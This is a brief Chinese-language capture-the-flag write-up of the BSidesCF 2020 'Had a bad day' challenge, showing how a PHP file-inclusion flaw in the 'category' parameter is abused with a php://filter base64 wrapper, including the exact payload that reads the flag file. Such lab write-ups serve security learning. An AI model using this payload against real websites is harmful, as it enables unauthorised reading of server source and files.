[BSidesCF 2020]Had a bad day

先看url,发现可能有注入

http://655c742e-b427-485c-9e15-20a1e7ef1717.node5.buuoj.cn:81/index.php?category=woofers

试试能不能查看index.php直接?category=index.php不行,试试伪协议

[BSidesCF 2020]Had a bad day_第1张图片

把.php去掉试试

[BSidesCF 2020]Had a bad day_第2张图片

base64解码

[BSidesCF 2020]Had a bad day_第3张图片

    

说明参数要包含woofers、meowers、index

试试读取flag文件

?category=php://filter/convert.base64-encode/index/resource=flag

[BSidesCF 2020]Had a bad day_第4张图片

base64解码

[BSidesCF 2020]Had a bad day_第5张图片

你可能感兴趣的:(android)